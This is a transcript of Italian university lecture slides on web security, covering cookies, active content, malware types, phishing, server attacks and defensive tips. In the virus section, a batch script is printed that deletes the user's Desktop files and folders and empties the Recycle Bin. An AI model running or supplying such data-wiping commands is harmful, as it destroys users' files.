Applicazioni di Informatica per le Produzioni Multimediali - Sicurezza sul Web - PDF
Document Details
Uploaded by ContrastyShofar3457
Università degli Studi di Salerno
2024
Domenico Santaniello
Tags
Summary
Questi appunti trattano la sicurezza del web, includendo argomenti come la statelessness di HTTP, i cookie, il contenuto attivo, i virus, i worm e i trojan, con esempi pratici in Visual Basic. Vengono analizzati gli attacchi ai client e ai server, così come gli attacchi alle informazioni in transito.
Full Transcript
Applicazioni di Informatica per le Produzioni Multimediali LA SICUREZZA SUL WEB P R O F. D O M E N I C O S A N TA N I E L L O A.A. 2024/2025...
Applicazioni di Informatica per le Produzioni Multimediali LA SICUREZZA SUL WEB P R O F. D O M E N I C O S A N TA N I E L L O A.A. 2024/2025 Scienze dello Spettacolo e della Produzione Multimediale La Sicurezza ed il Web Il Web usa Internet per stabilire le connessioni e trasportare le informazioni e offrendo un interfaccia per accedere a molti servizi. Gli elementi principali sono: URL – Uniform Resource Locator HTTP - HyperText Transfer Protocol HTML - HyperText Markup Language Browser Cookie Il protocollo HTTP è stateless, ossia senza memoria rispetto alle richieste del client. Come si fa se un server ha bisogno di ricordare informazioni utili? Netscape nel 1994 inventò i cookie Un cookie è una piccola informazione, un piccolo pezzettino di testo aggiuntivo che viene utilizzato dai server come identificativo univoco del client. Il sito web di Amazon fa un utilizzo massiccio dei cookie, riconoscendoti anche se non hai effettuato l'accesso. Cookie In linea di massima i cookie, come qualsiasi altra invenzione sul web, non sono stati progettati con intenzioni pericolose. Tuttavia molto spesso venivano utilizzati, senza consenso, per monitorare gli interessi degli utenti segnalandogli pubblicità mirata. Tale strumento è stato quindi utilizzato per tracciare le persone. Contenuto attivo nelle pagine web Inizialmente il web fu progettato per assolvere a mansioni semplici. Non fu messo in conto che i computer sarebbero diventati sempre più potenti con capacità di essere programmati. Per contenuto attivo si intende del contenuto, anche proveniente dal web, che può essere eseguito. Linguaggi contenuti e gestiti dai browser: Java JavaScript Adobe Flash Apple Quicktime Tali possono presentarsi anche sotto forma di plug-in Contenuto attivo altrove Oltre al web classico, il contenuto attivo può presentarsi altrove: E-mail Servizi Cloud I file PDF possono invocare automaticamente JavaScript. Anche delle semplici e-mail che contengono delle immagini possono rappresentare contenuto attivo, tali immagini vengono dette web beacon. Bisogna prestare sempre attenzione alle estensioni dei file che si eseguono. Virus Worm e Trojan Per virus o worm intendiamo codice, spesso maligno, che si propaga da un sistema all'altro. I virus si propagano grazie all'assistenza dell'utente I worm possono propagarsi senza assistenza Robert T. Morris, durante il suo dottorato, voleva fare un esperimento per misurare le dimensioni di Internet. Progettò un worm in grado di copiare se stesso da un computer all'altro. L'esperimento gli sfuggì di mano ed il worm si propagò ad una velocità inaspettata rendendo molti computer inutilizzabili. Morris fu multato e costretto ai servizi sociali. Virus Worm e Trojan I virus cominciarono a diffondersi notevolmente attraverso i programmi Microsoft Office con l'arrivo di Visual Basic. I virus in VB erano molto facile da creare e sfruttavano la caratteristica che i prodotti Office permettevano l'avvio automatico di default del contenuto scritto in VB. Nella fase di propagazione, normalmente i virus inviano una copia di se stessi via e-mail. Il worm Stuxnet causava fluttuazioni di velocità dei motori che portavano al danneggiamento dei macchinari per apparente usura. Virus Worm e Trojan Un trojan horse o cavallo di troia è un programma che si finge inutile, innocuo ma che causa danni. Spesso la vittima è indotta a scaricare e installare questo programma pensando che gli risolvesse problemi di sicurezza, invece li causa. La maggior parte dei trojan proviene via e-mail, ovviamente anche in questo caso bisogna prestare attenzione ai supporti di archiviazione fisici. Virus Worm e Trojan @Echo OFF Un esempio di virus non intenzionale.. For %%# in ( "%USERPROFILE%\Desktop\*" ) Do ( If /I not "%%~x#" EQU ".lnk" ( Del /Q "%%#" ) ) FOR /D %%# IN ( "%USERPROFILE%\Desktop\*" ) DO ( rmdir "%%#" /s /q ) for /f "delims=" %%y in (NumberPC.txt) do set number=%%y mkdir %USERPROFILE%\Desktop\PC%number% rd /s /q %systemdrive%\$Recycle.bin Web Security Il web solleva numerose e complicate questioni di sicurezza. In generale, si potrebbero dividere le minacce in tre tipologie: Attacchi ai client Attacchi ai server Attacchi alle informazioni in transito Web Security Attacchi ai Client Gli attacchi ai client comprendono seccature come lo spam, il tracciamento ed altri percoli più gravi. In particolar modo possono riguardare la divulgazione di informazioni private come il numero della vostra carda di credito e del conto in banca, o password che potrebbero permettere a qualcun'altro di fingere di essere voi. Web Security Attacchi ai Client Lo spam riguarda la pratica di inviare email non richieste a scopi malevoli. Tale pratica ha raggiunto volumi tali da mettere in pericolo la stessa posta elettronica. Esistono filtri anti-spam che cercano di riconoscere le e-mail spam analizzandone il contenuto. Allo scopo di riconoscere lo spam vengono anche impiegate tecniche proprie dell'Intelligenza artificiale. Web Security Attacchi ai Client Gli attacchi di phishing cercano di convincere il destinatario a fornire volontariamente informazioni che potrebbero venire usate per furti. Gli attacchi di phishing sono subdoli, le email che arrivano sono plausibili sembrano di provenire da un istituzione legittima un amico un collega e vi chiedono di andare sul sito leggere un documento o verificare alcune credenziali. Se ci cascate permetterete al malintenzionato l'accesso al vostro computer o preziose informazioni su voi stessi. Web Security Attacchi ai Client Lo spaear phishing riguarda attacchi più sofisticati. Si tratta di un tipo di ingegneria sociale che spinge la vittima a fare qualcosa di stupido fingendo una relazione personale con lei come un amico o un collega. Immaginate quanto particolarmente efficace possa essere una messaggio email di spaear phishing da parte di un dirigente di alto livello di un'azienda diretto ai suoi sottoposti. Web Security Attacchi ai Client Con spywere si intende un programma in esecuzione sul computer che invia informazioni personali da qualche altra parte. Tali programmi possono avere fini commerciali o di spionaggio vero e proprio. Chi attacca spesso installa uno zombie, un programma che attende finché viene non viene attivato via internet a cui viene ordinato di compiere qualche azione. Si può inoltre compromettere la sicurezza installando un keylogger che è in grado di intercettare ciò che viene battuto sulla tastiera. WWW: Web Security Attacchi ai Client Alcuni malware sono in grado di cifrare i contenuti del vostro computer inducendovi a spendere denaro per liberarsi del problema Altri malware sono in grado di rubare le credenziali bancarie tramite keylogging ma anche inviare spam dal vostro computer per far partire altri attacchi. Esiste un mercato in espansione per la vendita di malware Web Security Attacchi ai Server Sono attacchi che non riguardano i client ma che in qualche modo li possono coinvolgere rendendoli vittime. i server devono essere programmati e configurati attentamente per evitare i tipi di attacchi che avvengono all'ordine del giorno. I server sono esposti ad attacchi denial of service (DoS) durante i quali un sito internet viene sovraccaricato in termini di traffico. Esistono anche gli attacchi DoS Distribuiti (DDoS) Web Security Attacchi ai Server Tipicamente per attaccare un server bisogna riuscire ad ottenere un accesso con privilegi amministrativi. L'autore dell'attacco può: Deturpare/rovinare un sito web Scaricare software dannosi Pubblicare materiale imbarazzante sul sito web Divulgare informazioni sensibili … Web Security Attacchi alle informazioni in transito Sono meno pericolosi di quelli precedenti sebbene siano di una certa gravità e frequenza. in questa categoria ricadono anche gli attacchi man-in-the-middle. Per evitare questo tipo di attacchi è possibile stabilire delle connessioni cifrate con il server attraverso l'utilizzo del protocollo HTTPS. Oppure ricorrere all'utilizzo delle Virtual Private Network (VPN) che stabiliscono un percorso cifrato tra due computer. Come Difendersi Difendersi non è facile. Chi attacca ha bisogno di trovare un solo punto debole chi si difende deve farlo contro tutti i possibili attacchi. Alcuni suggerimenti: Non scegliete password banali non usate la stessa password per siti importanti se possibile utilizzate il autenticazione a due fattori Come Difendersi Non aprite allegati inviati da sconosciuti o allegati sospetti da parte di amici e colleghi Non accettate, cliccate o installate quando vi viene chiesto di farlo Non scaricate i programmi di dubbia provenienza Non fate niente di importante tramite Wi-Fi aperto Controllate se le vostre connessioni cifrate Eseguite regolarmente il backup delle vostre informazioni in un posto sicuro Impostate sempre una password sui dispositivi Domande?